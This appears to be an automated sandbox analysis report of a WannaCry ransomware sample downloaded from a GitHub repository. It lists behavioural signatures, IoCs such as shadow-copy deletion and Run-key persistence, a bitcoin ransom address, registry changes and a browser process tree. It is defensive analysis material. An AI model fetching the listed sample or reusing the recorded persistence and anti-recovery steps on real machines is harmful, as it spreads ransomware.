Analysis
-
max time kernel
782s -
max time network
783s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
18-07-2024 11:59
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
Resource
win10v2004-20240709-en
Errors
General
-
Target
https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
wannacry
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 10 IoCs
flow pid Process 209 3336 powershell.exe 211 3336 powershell.exe 233 364 powershell.exe 235 364 powershell.exe 236 3596 powershell.exe 237 3596 powershell.exe 238 1852 powershell.exe 239 1852 powershell.exe 245 8584 powershell.exe 247 8584 powershell.exe -
pid Process 364 powershell.exe 3596 powershell.exe 1852 powershell.exe 8584 powershell.exe 3336 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8371.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8388.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Executes dropped EXE 64 IoCs
pid Process 2816 taskdl.exe 4856 @[email protected] 4604 @[email protected] 5460 taskhsvc.exe 4080 taskdl.exe 3344 taskse.exe 4528 @[email protected] 556 taskdl.exe 4420 taskse.exe 2220 @[email protected] 4936 taskse.exe 5480 @[email protected] 5812 taskdl.exe 5180 taskse.exe 2700 @[email protected] 5240 taskdl.exe 2876 taskse.exe 4976 @[email protected] 5892 taskdl.exe 912 taskse.exe 4332 @[email protected] 4556 taskdl.exe 1856 @[email protected] 2392 taskse.exe 5176 taskdl.exe 1036 taskse.exe 5444 @[email protected] 1756 taskdl.exe 4652 taskse.exe 2704 @[email protected] 2396 taskdl.exe 1720 robux.exe 2156 taskse.exe 5820 @[email protected] 3948 taskdl.exe 5812 taskse.exe 5464 @[email protected] 5508 taskdl.exe 1768 taskse.exe 704 @[email protected] 392 taskdl.exe 2300 taskse.exe 5708 @[email protected] 1756 taskdl.exe 5672 taskse.exe 6128 @[email protected] 3336 taskdl.exe 5216 taskse.exe 2136 @[email protected] 4412 taskdl.exe 2044 taskse.exe 516 @[email protected] 5840 taskdl.exe 3460 taskse.exe 2376 @[email protected] 5808 taskdl.exe 5328 taskse.exe 5592 @[email protected] 5508 taskdl.exe 1512 taskse.exe 2968 @[email protected] 4280 taskdl.exe 4552 taskse.exe 4740 @[email protected] -
Loads dropped DLL 9 IoCs
pid Process 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4368 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kcuvipyafvelmp658 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 48 raw.githubusercontent.com 51 raw.githubusercontent.com -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 9108 timeout.exe 9440 timeout.exe 3820 timeout.exe 2164 timeout.exe 5740 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "155" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133657784757072016" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-47134698-4092160662-1261813102-1000\{AC36E1B1-E990-48EC-AA5A-5007B7F89473} msedge.exe Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-47134698-4092160662-1261813102-1000\{F105CE29-1165-4A94-89A1-1C6467B4786A} chrome.exe Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4396 reg.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 872239.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 227929.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 4768 msedge.exe 4768 msedge.exe 4596 msedge.exe 4596 msedge.exe 2284 identity_helper.exe 2284 identity_helper.exe 3580 msedge.exe 3580 msedge.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 5460 taskhsvc.exe 5460 taskhsvc.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 3840 msedge.exe 3840 msedge.exe 644 msedge.exe 644 msedge.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 2940 msedge.exe 2940 msedge.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 8584 powershell.exe 8584 powershell.exe 8584 powershell.exe 6940 chrome.exe 6940 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4528 @[email protected] 4264 cmd.exe 4204 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs
pid Process 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 6940 chrome.exe 6940 chrome.exe 6940 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2220 taskmgr.exe Token: SeSystemProfilePrivilege 2220 taskmgr.exe Token: SeCreateGlobalPrivilege 2220 taskmgr.exe Token: SeIncreaseQuotaPrivilege 5564 WMIC.exe Token: SeSecurityPrivilege 5564 WMIC.exe Token: SeTakeOwnershipPrivilege 5564 WMIC.exe Token: SeLoadDriverPrivilege 5564 WMIC.exe Token: SeSystemProfilePrivilege 5564 WMIC.exe Token: SeSystemtimePrivilege 5564 WMIC.exe Token: SeProfSingleProcessPrivilege 5564 WMIC.exe Token: SeIncBasePriorityPrivilege 5564 WMIC.exe Token: SeCreatePagefilePrivilege 5564 WMIC.exe Token: SeBackupPrivilege 5564 WMIC.exe Token: SeRestorePrivilege 5564 WMIC.exe Token: SeShutdownPrivilege 5564 WMIC.exe Token: SeDebugPrivilege 5564 WMIC.exe Token: SeSystemEnvironmentPrivilege 5564 WMIC.exe Token: SeRemoteShutdownPrivilege 5564 WMIC.exe Token: SeUndockPrivilege 5564 WMIC.exe Token: SeManageVolumePrivilege 5564 WMIC.exe Token: 33 5564 WMIC.exe Token: 34 5564 WMIC.exe Token: 35 5564 WMIC.exe Token: 36 5564 WMIC.exe Token: SeIncreaseQuotaPrivilege 5564 WMIC.exe Token: SeSecurityPrivilege 5564 WMIC.exe Token: SeTakeOwnershipPrivilege 5564 WMIC.exe Token: SeLoadDriverPrivilege 5564 WMIC.exe Token: SeSystemProfilePrivilege 5564 WMIC.exe Token: SeSystemtimePrivilege 5564 WMIC.exe Token: SeProfSingleProcessPrivilege 5564 WMIC.exe Token: SeIncBasePriorityPrivilege 5564 WMIC.exe Token: SeCreatePagefilePrivilege 5564 WMIC.exe Token: SeBackupPrivilege 5564 WMIC.exe Token: SeRestorePrivilege 5564 WMIC.exe Token: SeShutdownPrivilege 5564 WMIC.exe Token: SeDebugPrivilege 5564 WMIC.exe Token: SeSystemEnvironmentPrivilege 5564 WMIC.exe Token: SeRemoteShutdownPrivilege 5564 WMIC.exe Token: SeUndockPrivilege 5564 WMIC.exe Token: SeManageVolumePrivilege 5564 WMIC.exe Token: 33 5564 WMIC.exe Token: 34 5564 WMIC.exe Token: 35 5564 WMIC.exe Token: 36 5564 WMIC.exe Token: SeBackupPrivilege 1616 vssvc.exe Token: SeRestorePrivilege 1616 vssvc.exe Token: SeAuditPrivilege 1616 vssvc.exe Token: 33 2220 taskmgr.exe Token: SeIncBasePriorityPrivilege 2220 taskmgr.exe Token: SeTcbPrivilege 3344 taskse.exe Token: SeTcbPrivilege 3344 taskse.exe Token: SeTcbPrivilege 4420 taskse.exe Token: SeTcbPrivilege 4420 taskse.exe Token: SeTcbPrivilege 4936 taskse.exe Token: SeTcbPrivilege 4936 taskse.exe Token: SeTcbPrivilege 5180 taskse.exe Token: SeTcbPrivilege 5180 taskse.exe Token: SeTcbPrivilege 2876 taskse.exe Token: SeTcbPrivilege 2876 taskse.exe Token: SeTcbPrivilege 912 taskse.exe Token: SeTcbPrivilege 912 taskse.exe Token: SeTcbPrivilege 2392 taskse.exe Token: SeTcbPrivilege 2392 taskse.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe 2220 taskmgr.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 4856 @[email protected] 4856 @[email protected] 4604 @[email protected] 4604 @[email protected] 4528 @[email protected] 4528 @[email protected] 2220 @[email protected] 5480 @[email protected] 2700 @[email protected] 4976 @[email protected] 4332 @[email protected] 1856 @[email protected] 5444 @[email protected] 2704 @[email protected] 5820 @[email protected] 5464 @[email protected] 704 @[email protected] 5708 @[email protected] 6128 @[email protected] 2136 @[email protected] 516 @[email protected] 2376 @[email protected] 5592 @[email protected] 2968 @[email protected] 4740 @[email protected] 7728 @[email protected] 9244 @[email protected] 13212 @[email protected] 9580 @[email protected] 11240 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4596 wrote to memory of 3600 4596 msedge.exe 83 PID 4596 wrote to memory of 3600 4596 msedge.exe 83 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 3392 4596 msedge.exe 84 PID 4596 wrote to memory of 4768 4596 msedge.exe 85 PID 4596 wrote to memory of 4768 4596 msedge.exe 85 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 PID 4596 wrote to memory of 620 4596 msedge.exe 86 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2728 attrib.exe 3268 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb99446f8,0x7fffb9944708,0x7fffb99447182⤵PID:3600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:22⤵PID:3392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:82⤵PID:620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵PID:1604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5652 /prefetch:82⤵PID:4240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:5428
-
-
